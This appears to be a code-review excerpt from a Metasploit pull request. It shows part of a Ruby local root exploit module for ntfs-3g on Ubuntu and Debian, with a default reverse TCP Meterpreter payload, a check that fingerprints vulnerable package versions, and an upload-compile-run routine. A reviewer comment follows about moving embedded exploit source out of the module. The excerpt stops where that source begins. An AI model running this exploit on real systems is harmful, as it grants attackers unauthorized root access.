modules/exploits/linux/local/ntfs3g_priv_esc.rb

```diff
@@ -0,0 +1,469 @@
+          ],
+        'DefaultOptions' =>
+          {
+            'payload' => 'linux/x64/mettle/reverse_tcp',
+            'PrependFork' => true,
+            },
+        'DefaultTarget' => 1,
+        'DisclosureDate' => 'Jan 05 2017',
+        'Privileged'     => true
+      }
+      ))
+    register_options([
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ], self.class)
+  end
+
+  def check
+
+    # check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
+    def headers_installed?()
+      output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
+      if output
+        if output.include?('linux-headers')
+          return true
+        else
+          print_error('Linux kernel headers not available, compiling will fail.')
+          return false
+        end
+      end
+      false
+    end
+
+    output = cmd_exec('dpkg -l ntfs-3g | grep \'^ii\'')
+    if output
+      if output.include?('1:2015.3.14AR.1-1build1') #Ubuntu 16.04 LTS
+        print_good('Vulnerable Ubuntu 16.04 detected')
+        CheckCode::Appears
+      elsif output.include?('1:2016.2.22AR.1-3') #Ubuntu 16.10
+        print_good('Vulnerable Ubuntu 16.10 detected')
+        CheckCode::Appears
+      elsif output.include?('1:2012.1.15AR.5-2.1+deb7u2') #Debian Wheezy, we also need linux-source installed
+        print_good('Vulnerable Debian 7 (wheezy) detected')
+        if headers_installed?()
+          CheckCode::Appears
+        else
+          CheckCode::Safe
+        end
+        CheckCode::Appears
+      elsif output.include?('1:2014.2.15AR.2-1+deb8u2') #Debian Jessie, we also need linux-source installed
+        print_good('Vulnerable Debian 8 (jessie) detected')
+        if headers_installed?()
+          CheckCode::Appears
+        else
+          CheckCode::Safe
+        end
+        CheckCode::Appears
+      else
+        print_error("Version installed not vulnerable: #{output}")
+        CheckCode::Safe
+      end
+    else
+      print_error('ntfs-3g not installed')
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    def upload_and_compile(filename, file_path, file_content, compile=nil)
+      rm_f "#{file_path}"
+      if not compile.nil?
+        rm_f "#{file_path}.c"
+        vprint_status("Writing #{filename} to #{file_path}.c")
+        write_file("#{file_path}.c", file_content)
+        register_file_for_cleanup("#{file_path}.c")
+        output = cmd_exec(compile)
+        if output != ''
+          print_error(output)
+          fail_with(Failure::Unknown, "#{filename} at #{file_path}.c failed to compile")
+        end
+      else
+        vprint_status("Writing #{filename} to #{file_path}")
+        write_file(file_path, file_content)
+      end
+      cmd_exec("chmod +x #{file_path}");
+      register_file_for_cleanup(file_path)
+    end
+
+    # These are direct copies of the modules from EDB
+    rootmod = %q{
```

Comment:
That would, at the very least, avoid killing `msftidy` and consequently Travis. I also think it's the right thing to do when you have any significant length of external source. It doesn't belong in the module.